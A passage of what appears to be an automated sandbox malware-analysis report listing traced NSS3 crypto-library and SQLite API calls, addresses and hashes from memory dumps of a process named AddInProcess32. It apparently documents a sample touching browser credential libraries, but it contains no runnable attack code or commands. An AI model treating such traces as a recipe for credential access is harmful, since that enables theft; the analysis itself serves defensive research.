                                                                                      • SECKEY_PublicKeyStrength.NSS3(00000000,?,00000000,00000000), ref: 6CD27F83
                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,00000000,00000000,?,00000000,00000000), ref: 6CD27F8D
                                                                                      • PK11_AlgtagToMechanism.NSS3(00000010,6CD2467F,00000000,6CD24457,?,00000000,00000000), ref: 6CD27FB2
                                                                                      • PK11_PubWrapSymKey.NSS3(00000000,6CD2467F,00000000,6CD24457,?,00000000,00000000), ref: 6CD27FB9
                                                                                      • SECKEY_DestroyPublicKey.NSS3(6CD2467F,00000000,6CD2467F,00000000,6CD24457,?,00000000,00000000), ref: 6CD27FC3
                                                                                      • SECOID_SetAlgorithmID_Util.NSS3(?,6CD2441F,00000010,00000000,?,?,?,?,?,?,00000000,00000000), ref: 6CD27FDB
                                                                                      • PORT_SetError_Util.NSS3(FFFFE006,?,00000000,00000000), ref: 6CD27FFA
                                                                                      • PT_FPrintStats.NSS3(?,?,?,?,00000000,00000000), ref: 6CD28021
                                                                                      • SECKEY_DestroyPublicKey.NSS3(00000000,?,?,00000000,00000000), ref: 6CD28038
                                                                                      • PORT_ArenaRelease_Util.NSS3(?,?,?,?,00000000,00000000), ref: 6CD28048
                                                                                      • PK11_FreeSymKey.NSS3(00000000,?,?,00000000,00000000), ref: 6CD2805D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: K11_Util$Public$Arena$AlgorithmAlgtagDestroyFreeMechanismSlot$Alloc_BestError_ExtractFindMark_PrintRelease_StatsStrengthTag_Wrap
                                                                                      • String ID:
                                                                                      • API String ID: 84283481-0
                                                                                      • Opcode ID: b6860cf46dc7ac014cf63595a981acc9462a5fdd2134742f4289e5491f1efe4b
                                                                                      • Instruction ID: 7d182db58bda643c369af228d9903cc5b72e4824607733713335ecd4d1cf1152
                                                                                      • Opcode Fuzzy Hash: b6860cf46dc7ac014cf63595a981acc9462a5fdd2134742f4289e5491f1efe4b
                                                                                      • Instruction Fuzzy Hash: A5519672D05206EFDF118FA4DD40AAEBBB5EF0435CF240166EA10A7E61EB35D914CBA0
                                                                                      APIs
                                                                                      • PR_GetCurrentThread.NSS3(?,?), ref: 6CCC8F26
                                                                                        • Part of subcall function 6CCDB1F9: PR_Init.NSS3(6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCDB202
                                                                                      • PR_WaitCondVar.NSS3(?,?,00000000,?,?), ref: 6CCC8F35
                                                                                      • PR_GetError.NSS3(00000000,?,?), ref: 6CCC8F4B
                                                                                      • PR_Unlock.NSS3(?,00000000,?,?), ref: 6CCC8F85
                                                                                      • PR_Calloc.NSS3(00000001,-0000003F,?,00000000,?,?), ref: 6CCC8F94
                                                                                      • PR_Lock.NSS3(?,00000000,?,?), ref: 6CCC8FB8
                                                                                      • PR_IntervalNow.NSS3(00000000,?,?), ref: 6CCC8FDB
                                                                                      • PR_Unlock.NSS3(?,00000000,?,?), ref: 6CCC9094
                                                                                      • PR_Poll.NSS3(?,00000000,?,?,00000000,?,?), ref: 6CCC90A0
                                                                                        • Part of subcall function 6CCC628B: PR_SetError.NSS3(FFFFE897,00000000), ref: 6CCCD949
                                                                                      • PR_Lock.NSS3(?,?,00000000,?,?,00000000,?,?), ref: 6CCC90AB
                                                                                        • Part of subcall function 6CCD98BD: EnterCriticalSection.KERNEL32(?,774CDF20,00000000,?,6CCD9FF0,?,?,?,?,?,?,?,6CCC7CFB,00000000,?,6CCD411D), ref: 6CCD98D0
                                                                                      • PR_SetError.NSS3(FFFFE8D5,00000000,?,00000000,?,?), ref: 6CCC9128
                                                                                      • PR_SetError.NSS3(FFFFE890,00000000,00000000,?,?), ref: 6CCC913A
                                                                                      • PR_Lock.NSS3(?,FFFFE890,00000000,00000000,?,?), ref: 6CCC9142
                                                                                      • PR_SetError.NSS3(FFFFE8D5,00000000,00000000,?,?), ref: 6CCC9155
                                                                                      • PR_NotifyCondVar.NSS3(?,?,?), ref: 6CCC9171
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Error$Lock$CondUnlock$CallocCriticalCurrentEnterInitIntervalNotifyPollSectionThreadWait
                                                                                      • String ID:
                                                                                      • API String ID: 2887746064-0
                                                                                      • Opcode ID: bc2fa335f7cc63e153b48c2811760d0cf7ba0f4e84cfe27d768e469dbce63df0
                                                                                      • Instruction ID: 2ec95a089ed90a425b782c930f9bef8d71e2d3259dbdd7be7d223fec4bcf4d7f
                                                                                      • Opcode Fuzzy Hash: bc2fa335f7cc63e153b48c2811760d0cf7ba0f4e84cfe27d768e469dbce63df0
                                                                                      • Instruction Fuzzy Hash: E171BD71A006009FDB10DF79C94086AB7F6FF497087208A6AE856C7F50FB31E946CB52
                                                                                      APIs
                                                                                      • PORT_SetError_Util.NSS3(FFFFE09A), ref: 6CD14D57
                                                                                        • Part of subcall function 6CD1CB04: PR_SetError.NSS3(?,00000000,?,6CCDC9C2,FFFFE007,00000000,?,00000000), ref: 6CD1CB0C
                                                                                      • PR_Lock.NSS3(?,?), ref: 6CD14D72
                                                                                      • PR_Unlock.NSS3(?), ref: 6CD14D85
                                                                                      • PORT_SetError_Util.NSS3(FFFFE098), ref: 6CD14E9E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Error_Util$ErrorLockUnlock
                                                                                      • String ID:
                                                                                      • API String ID: 3517540473-0
                                                                                      • Opcode ID: 89985ae67f3c101f4d8d2e7f22f667376cd9af9854c7150e997dcce996ea60d8
                                                                                      • Instruction ID: c7f62a54a17a4b9d74c4163f303da0b912b48884770e6a890070d72f2ec8951e
                                                                                      • Opcode Fuzzy Hash: 89985ae67f3c101f4d8d2e7f22f667376cd9af9854c7150e997dcce996ea60d8
                                                                                      • Instruction Fuzzy Hash: 8F41EF32508B01EFDB259F75E804A5ABBB5FF45328F148B1DE4A682EB0EB31E451CB50
                                                                                      APIs
                                                                                      • PR_Calloc.NSS3(00000001,00000040,?,6CCC86DA,0000003B,?,6CCC873E), ref: 6CCC8990
                                                                                      • PR_SetError.NSS3(FFFFE890,00000000,?,6CCC86DA,0000003B,?,6CCC873E), ref: 6CCC89A3
                                                                                        • Part of subcall function 6CCD36F3: PR_GetCurrentThread.NSS3(?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCD36F6
                                                                                      • PR_NewLock.NSS3(?,6CCC86DA,0000003B,?,6CCC873E), ref: 6CCC89AE
                                                                                      • PR_NewCondVar.NSS3(00000000,?,6CCC86DA,0000003B,?,6CCC873E), ref: 6CCC89BF
                                                                                      • PR_NewCondVar.NSS3(?,?,6CCC86DA,0000003B,?,6CCC873E), ref: 6CCC89D3
                                                                                      • PR_NewCondVar.NSS3(?,?,6CCC86DA,0000003B,?,6CCC873E), ref: 6CCC89E3
                                                                                      • PR_NewCondVar.NSS3(?,?,6CCC86DA,0000003B,?,6CCC873E), ref: 6CCC89F3
                                                                                      • PR_Calloc.NSS3(00000001,000000F4,?,6CCC86DA,0000003B,?,6CCC873E), ref: 6CCC8A14
                                                                                      • PR_SetError.NSS3(FFFFE890,00000000,?,6CCC86DA,0000003B,?,6CCC873E), ref: 6CCC8A28
                                                                                      • PR_DestroyCondVar.NSS3(?,FFFFE890,00000000,?,6CCC86DA,0000003B,?,6CCC873E), ref: 6CCC8A30
                                                                                      • PR_DestroyCondVar.NSS3(?,?,6CCC86DA,0000003B,?,6CCC873E), ref: 6CCC8A3B
                                                                                      • PR_DestroyCondVar.NSS3(?,?,6CCC86DA,0000003B,?,6CCC873E), ref: 6CCC8A44
                                                                                      • PR_DestroyCondVar.NSS3(?,?,6CCC86DA,0000003B,?,6CCC873E), ref: 6CCC8A4D
                                                                                      • PR_DestroyLock.NSS3(?,?,6CCC86DA,0000003B,?,6CCC873E), ref: 6CCC8A56
                                                                                      • PR_Lock.NSS3(?,6CCC86DA,0000003B,?,6CCC873E), ref: 6CCC8A7C
                                                                                        • Part of subcall function 6CCD98BD: EnterCriticalSection.KERNEL32(?,774CDF20,00000000,?,6CCD9FF0,?,?,?,?,?,?,?,6CCC7CFB,00000000,?,6CCD411D), ref: 6CCD98D0
                                                                                      • PR_Unlock.NSS3(?,6CCC86DA,0000003B,?,6CCC873E), ref: 6CCC8A9D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Cond$Destroy$Lock$CallocError$CriticalCurrentEnterSectionThreadUnlock
                                                                                      • String ID:
                                                                                      • API String ID: 3136965760-0
                                                                                      • Opcode ID: 1115b60152515db143c6163ca2dd66540e695b9fa9f15fb95e9c06bcfe988b03
                                                                                      • Instruction ID: 89685eb32f97ec96b3678dc5c28fb025146579aa473087a446aa270c3192fdab
                                                                                      • Opcode Fuzzy Hash: 1115b60152515db143c6163ca2dd66540e695b9fa9f15fb95e9c06bcfe988b03
                                                                                      • Instruction Fuzzy Hash: E331F375604701AEE725AF25EC11947BBF0EF05728721492EE1898AFA0FF31F845CB45
                                                                                      APIs
                                                                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,pkcs11:,00000007,00000000,00000000,00000000,00000000,00000001), ref: 6CCFC8FE
                                                                                      • PORT_Strdup_Util.NSS3(00000000,?,?,?,?,?,?,?,?,00000000), ref: 6CCFC924
                                                                                      • strchr.VCRUNTIME140(00000000,0000003A,?,?,?,?,?,?,?,?,00000000), ref: 6CCFC93A
                                                                                      • PK11_ReferenceSlot.NSS3(?,?,?,?,?,?,?,?,?,00000000), ref: 6CCFC964
                                                                                      • PK11_GetInternalKeySlot.NSS3(?,?,?,?,?,?,?,?,00000000), ref: 6CCFC982
                                                                                        • Part of subcall function 6CD122B8: SECMOD_GetInternalModule.NSS3(6CD12E06), ref: 6CD122C1
                                                                                        • Part of subcall function 6CD122B8: PORT_SetError_Util.NSS3(FFFFE040,6CD12E06), ref: 6CD122CF
                                                                                      • PORT_SetError_Util.NSS3(FFFFE041,?,?,?,?,?,?,?,?,00000000), ref: 6CCFC975
                                                                                        • Part of subcall function 6CD1CB04: PR_SetError.NSS3(?,00000000,?,6CCDC9C2,FFFFE007,00000000,?,00000000), ref: 6CD1CB0C
                                                                                      • PORT_SetError_Util.NSS3(FFFFE041,?,?,?,?,?,?,?,?,00000000), ref: 6CCFC9A6
                                                                                      • PK11_IsPresent.NSS3(00000000,?,?,?,?,?,?,?,?,00000000), ref: 6CCFC9B5
                                                                                      • PK11_IsInternal.NSS3(00000000), ref: 6CCFCA46
                                                                                      • strchr.VCRUNTIME140(?,00000040), ref: 6CCFCA56
                                                                                      • PORT_Free_Util.NSS3(?), ref: 6CCFCAAE
                                                                                      • PK11_FreeSlot.NSS3(00000000,?,?,?,?,?,?,?,?,00000000), ref: 6CCFCAE2
                                                                                      • PORT_Free_Util.NSS3(?,?,?,?,?,?,?,?,?,00000000), ref: 6CCFCAEB
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$K11_$Error_InternalSlot$Free_strchr$ErrorFreeModulePresentReferenceStrdup_strncmp
                                                                                      • String ID: pkcs11:
                                                                                      • API String ID: 1813313025-2446828420
                                                                                      • Opcode ID: 2e2b0b091d4d87246949dc2a0d68f907e64d697e70ee40b9bcc20c74be93e756
                                                                                      • Instruction ID: 64ba9bf323f762373e87eda046a1a93d897a0fc768b126cbe3c89a8834208e87
                                                                                      • Opcode Fuzzy Hash: 2e2b0b091d4d87246949dc2a0d68f907e64d697e70ee40b9bcc20c74be93e756
                                                                                      • Instruction Fuzzy Hash: 2151EA72A052057EEB51EBA59C40FEF777CDF41268F204019F524B6F90FF319A4686A1
                                                                                      APIs
                                                                                      • PORT_SetError_Util.NSS3(FFFFE005,00000000,00000000,?), ref: 6CCEC88E
                                                                                        • Part of subcall function 6CD1CB04: PR_SetError.NSS3(?,00000000,?,6CCDC9C2,FFFFE007,00000000,?,00000000), ref: 6CD1CB0C
                                                                                      • PORT_NewArena_Util.NSS3(00000800), ref: 6CCEC8C5
                                                                                      • SECITEM_FreeItem_Util.NSS3(?,00000000), ref: 6CCECA81
                                                                                      • SGN_DestroyDigestInfo_Util.NSS3(?), ref: 6CCECA8B
                                                                                      • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CCECA9B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$Arena_Free$DestroyDigestErrorError_Info_Item_
                                                                                      • String ID:
                                                                                      • API String ID: 2826015244-0
                                                                                      • Opcode ID: 17b1c7a31b0d721656f4f07a295a0090656f1023c3be554d2253a357fcd47adc
                                                                                      • Instruction ID: 4b09a397b4fb291cf6d52265bd93db74655c7c89646e35199f4433937c7df44c
                                                                                      • Opcode Fuzzy Hash: 17b1c7a31b0d721656f4f07a295a0090656f1023c3be554d2253a357fcd47adc
                                                                                      • Instruction Fuzzy Hash: 837192B2D042189FDF11DFA5DC40ADDBBF8BF4A354F24416AD814ABA50EB309949CB51
                                                                                      APIs
                                                                                      • PORT_SetError_Util.NSS3(FFFFE09A,CE534355,6CD04CC7,?,?,?,?,?,6CD14F2D,?), ref: 6CD14961
                                                                                        • Part of subcall function 6CD1CB04: PR_SetError.NSS3(?,00000000,?,6CCDC9C2,FFFFE007,00000000,?,00000000), ref: 6CD1CB0C
                                                                                      • PR_Lock.NSS3(C4830000,00000000,CE534355,6CD04CC7,?,?,?,?,?,6CD14F2D,?), ref: 6CD14973
                                                                                      • PORT_SetError_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,6CD14F2D,?), ref: 6CD14993
                                                                                      • PR_Unlock.NSS3(C4830000,?,?,?,?,?,?,?,?,?,6CD14F2D,?), ref: 6CD1499D
                                                                                      • PORT_Free_Util.NSS3(00000000,?,?,?,?,?,?,?,?,6CD14F2D,?), ref: 6CD149A9
                                                                                      • PK11_FreeSlot.NSS3(6CD14F2D,?,?,?,?,?,?,?,?,6CD14F2D,?), ref: 6CD149C6
                                                                                      • PORT_ArenaRelease_Util.NSS3(6CD14F2D,?,?,?,?,?,?,?,?,?,6CD14F2D,?), ref: 6CD149DF
                                                                                      • PR_Unlock.NSS3(C4830000,?,?,?,?,?,?,?,?,?,6CD14F2D,?), ref: 6CD149FB
                                                                                      • PORT_SetError_Util.NSS3(FFFFE097,?,?,?,?,?,?,?,?,?,6CD14F2D,?), ref: 6CD14A0E
                                                                                      • PORT_Alloc_Util.NSS3(438D085D,?,?,?,?,?,?,?,?,?,6CD14F2D,?), ref: 6CD14A19
                                                                                      • PR_Unlock.NSS3(C4830000,?,?,?,?,?,?,?,?,?,?,?,?,6CD14F2D,?), ref: 6CD14A43
                                                                                      • PORT_ArenaMark_Util.NSS3(6CD14F2D,?,?,?,?,?,?,?,?,?,?,?,?,6CD14F2D,?), ref: 6CD14A4B
                                                                                      • PORT_ArenaZAlloc_Util.NSS3(6CD14F2D,?,?,?,?,?,?,?,?,?,?,?,?,6CD14F2D,?), ref: 6CD14A66
                                                                                      • PORT_Free_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,6CD14F2D,?), ref: 6CD14ADF
                                                                                      • PT_FPrintStats.NSS3(6CD14F2D,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,6CD14F2D), ref: 6CD14AEA
                                                                                      • PK11_FreeSlot.NSS3(?), ref: 6CD14B27
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$ArenaError_Unlock$Alloc_FreeFree_K11_Slot$ErrorLockMark_PrintRelease_Stats
                                                                                      • String ID:
                                                                                      • API String ID: 3618076313-0
                                                                                      • Opcode ID: d592e3477e1558430c56767273e8f7b7c3031e25b095438befcdccc05c510500
                                                                                      • Instruction ID: 89ae2acdc9d7ca089f4d613a3146196a355e1978fdb6a6eafaf95e52f07a3e90
                                                                                      • Opcode Fuzzy Hash: d592e3477e1558430c56767273e8f7b7c3031e25b095438befcdccc05c510500
                                                                                      • Instruction Fuzzy Hash: DF519771909116EFDF05DFB8E8409AEBBB8FF453187200129F555A3E60EB319A11CBA4
                                                                                      APIs
                                                                                      • PORT_SetError_Util.NSS3(FFFFE005,00000000,?,6CCE8CA9,00000000), ref: 6CCE7DB1
                                                                                        • Part of subcall function 6CD1CB04: PR_SetError.NSS3(?,00000000,?,6CCDC9C2,FFFFE007,00000000,?,00000000), ref: 6CD1CB0C
                                                                                      • PORT_NewArena_Util.NSS3(00000800,00000000,?,00000000,?,6CCE8CA9,00000000), ref: 6CCE7DC5
                                                                                      • PORT_ArenaZAlloc_Util.NSS3(00000000,00000088,00000000,?,00000000,?,6CCE8CA9,00000000), ref: 6CCE7DDB
                                                                                      • SECITEM_CopyItem_Util.NSS3(00000000,00000000,6CCE8CA9,00000000,?,00000000,?,6CCE8CA9,00000000), ref: 6CCE7DF5
                                                                                      • SECITEM_CopyItem_Util.NSS3(00000000,0000000C,6CCE8CB5,00000000,?,00000000,?,6CCE8CA9,00000000), ref: 6CCE7E14
                                                                                      • SECITEM_CopyItem_Util.NSS3(00000000,00000018,6CCE8CC1,00000000,?,00000000,?,6CCE8CA9,00000000), ref: 6CCE7E33
                                                                                      • SECITEM_CopyItem_Util.NSS3(00000000,00000024,6CCE8CCD,00000000,?,00000000,?,6CCE8CA9,00000000), ref: 6CCE7E52
                                                                                      • SECITEM_CopyItem_Util.NSS3(00000000,00000030,6CCE8CD9,00000000,?,00000000,?,6CCE8CA9,00000000), ref: 6CCE7E71
                                                                                      • SECITEM_CopyItem_Util.NSS3(00000000,0000003C,6CCE8CE5,00000000,?,00000000,?,6CCE8CA9,00000000), ref: 6CCE7E90
                                                                                      • SECITEM_CopyItem_Util.NSS3(00000000,00000048,6CCE8CF1,00000000,?,00000000,?,6CCE8CA9,00000000), ref: 6CCE7EAF
                                                                                      • SECITEM_CopyItem_Util.NSS3(00000000,00000054,6CCE8CFD,00000000,?,00000000,?,6CCE8CA9,00000000), ref: 6CCE7ECA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$CopyItem_$Alloc_ArenaArena_ErrorError_
                                                                                      • String ID:
                                                                                      • API String ID: 738855642-0
                                                                                      • Opcode ID: 9739f95b433a6d42cae5816733c4136ddb6f43708899d8fb9b61a2aee70fccee
                                                                                      • Instruction ID: e810260ec639457b2c0e9bf44e48f9cf0468bf995f0e33b757aa7ea8d0d1e3d6
                                                                                      • Opcode Fuzzy Hash: 9739f95b433a6d42cae5816733c4136ddb6f43708899d8fb9b61a2aee70fccee
                                                                                      • Instruction Fuzzy Hash: 0A4154B2409604AEE7119A619D80FFB73ECAB4A709F14052ADD41C1EA6F734EA4CD7A1
                                                                                      APIs
                                                                                        • Part of subcall function 6CCE3503: SECOID_FindOID_Util.NSS3(00000000,?,6CCDBD71,?,?,?,?,?), ref: 6CCE3510
                                                                                      • CERT_DecodeAVAValue.NSS3(?,?,?,?,?), ref: 6CCDBE0E
                                                                                      • CERT_GetOidString.NSS3(?,?,?,?,?), ref: 6CCDBE40
                                                                                      • SECITEM_FreeItem_Util.NSS3(00000000,00000001,?,?,?,?), ref: 6CCDBE61
                                                                                      • PR_smprintf_free.NSS3(?), ref: 6CCDBE9B
                                                                                      • PORT_Alloc_Util.NSS3(00000003), ref: 6CCDBEF9
                                                                                      • SECITEM_FreeItem_Util.NSS3(00000000,00000001), ref: 6CCDBF08
                                                                                      • memcpy.VCRUNTIME140(?,?,00000001,?,00000000,00000000,?,?,6CCDC257,?), ref: 6CCDBF71
                                                                                      • PR_smprintf_free.NSS3(?), ref: 6CCDBF9E
                                                                                      • memcpy.VCRUNTIME140(?,?,?), ref: 6CCDBFF3
                                                                                      • memcpy.VCRUNTIME140("..,"..,?), ref: 6CCDC103
                                                                                        • Part of subcall function 6CCDD11D: PORT_SetError_Util.NSS3(FFFFE003), ref: 6CCDD150
                                                                                      • SECITEM_FreeItem_Util.NSS3(?,00000001), ref: 6CCDC11A
                                                                                      • PORT_Free_Util.NSS3(?), ref: 6CCDC140
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$FreeItem_memcpy$R_smprintf_free$Alloc_DecodeError_FindFree_StringValue
                                                                                      • String ID: "..
                                                                                      • API String ID: 4269256651-324620159
                                                                                      • Opcode ID: 3be8c07ae7b75cabf582ebb176b0a1f72b42a635ab9b0f6c86aa51c24d1fef7e
                                                                                      • Instruction ID: e46f9fbf953e0dc655b7950ddd088f799222f93b9ab516d7347aa9cf6220a9c4
                                                                                      • Opcode Fuzzy Hash: 3be8c07ae7b75cabf582ebb176b0a1f72b42a635ab9b0f6c86aa51c24d1fef7e
                                                                                      • Instruction Fuzzy Hash: 8AD1A071D04329CBEB25CF29CC98789B7B5BF44304F1185EAD60DA7A52E770AA85CF90
                                                                                      APIs
                                                                                      • sqlite3_value_text.NSS3(?), ref: 6CC68DAC
                                                                                      • sqlite3_value_text.NSS3(?,?), ref: 6CC68DB6
                                                                                      • sqlite3_result_error.NSS3(?,?,000000FF), ref: 6CC68EC7
                                                                                      • sqlite3_free.NSS3(?,?,?,000000FF), ref: 6CC68ECF
                                                                                      • sqlite3_result_error.NSS3(00000003,00000000,000000FF), ref: 6CC6908C
                                                                                      • sqlite3_result_error_code.NSS3(00000003,00000000), ref: 6CC690B0
                                                                                      Strings
                                                                                      • attached databases must use the same text encoding as main database, xrefs: 6CC68F57
                                                                                      • database %s is already in use, xrefs: 6CC68E4F
                                                                                      • database is already attached, xrefs: 6CC68F12
                                                                                      • unable to open database: %s, xrefs: 6CC69047
                                                                                      • out of memory, xrefs: 6CC69071
                                                                                      • too many attached databases - max %d, xrefs: 6CC68DE5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: sqlite3_result_errorsqlite3_value_text$sqlite3_freesqlite3_result_error_code
                                                                                      • String ID: attached databases must use the same text encoding as main database$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                      • API String ID: 2708513395-2224017942
                                                                                      • Opcode ID: 113b61b095c8662a0bca72b79ab35cdc2870a1727b003109311fce2b23c8d1ba
                                                                                      • Instruction ID: b67a7d6d61a2468883e0186a08023a451fe2d31d393e24d9f018e2362d8df904
                                                                                      • Opcode Fuzzy Hash: 113b61b095c8662a0bca72b79ab35cdc2870a1727b003109311fce2b23c8d1ba
